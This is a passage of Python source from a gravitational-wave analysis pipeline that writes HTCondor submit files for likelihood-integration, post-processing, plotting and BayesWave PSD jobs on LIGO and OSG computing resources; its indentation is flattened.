export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
if condor_commands is not None:
for cmd, value in condor_commands.iteritems():
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
f.write( exe + base_str+ "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="target",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
Note that *all ifo-specific results must be set outside this loop*, to work sensibly, and passed as an argument
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
import sys
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
